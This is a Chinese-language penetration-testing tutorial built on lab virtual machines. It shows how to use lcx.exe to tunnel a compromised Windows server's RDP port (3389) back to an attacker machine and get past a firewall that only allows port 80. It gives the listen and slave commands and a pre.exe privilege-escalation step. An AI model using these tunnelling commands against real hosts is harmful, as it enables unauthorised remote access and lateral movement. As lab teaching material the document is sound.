lcx.exe 端口轉發
環境搭建
首先網絡拓撲是這樣的。
攻擊機:個人PC 192.168.124.1
內網服務器: win2003 server VM 8 : 192.168.124.129
VM 1 : 192.168.2.103
win2008 server VM 1 : 192.168.2.108
前提:反彈端口的主機可以訪問公網
ps:這裏利用的虛擬機雙網卡完成環境搭建,真時情況可能是目標主機反彈到公網VPS。
首先獲取到了win2003的webshell ,但是這個服務器防火牆規則只開啓了80端口供外網訪問,所以拿到了webshell也無法通過創建賬號利用3389端口遠程連接。所以既不能遠程連接又不可以掃描內網。此時就需要內網滲透技術。
這裏lcx
利用lcx.exe反彈端口
建立隧道:
首先需要在攻擊機和內網肉雞上傳lcx反彈端口的exe文件,並按如下過程執行命令。
攻擊機:192.168.124.1
執行: lcx.exe -listen 4444 5555
同時監聽 4444 和 5555端口
肉雞:192.168.124.129
執行: 網站目錄/lcx.exe -slave 192.168.124.1 4444 192.168.124.129 3389
注意肉雞的lcx.exe文件需要上傳到80端口網站所對應的網站目錄下。不然無法執行命令,且必須有高權限。比如用pre.exe進行提權,在pre的環境下執行:pre.exe “lcx.exe -slave 192.168.124.1 4444 192.168.124.129 3389”。
隧道拓撲:
執行完上述兩條命令後,在攻擊機上 win+R -> 輸入mstsc ,調出遠程桌面程序。
訪問本機5555端口即可。
完成!
Ps:因爲win2003server開啓了防火牆,應該是win2003server入站規則禁用了ICMP主機也就沒辦法ping通win20003了,但是隧道機制是基於傳輸層上的TCP/UDP ,所以可以在應用層之間完成傳輸數據,達到遠程桌面連接。
也就是通過 192.168.124.1:4444------------192.168.124.129:3389 這個隧道(TCP連接)向攻擊機開啓了一個5555端口,而攻擊機通過訪問5555端口來加入這個隧道進而實現遠程桌面連接(與肉雞3389端口的通信)。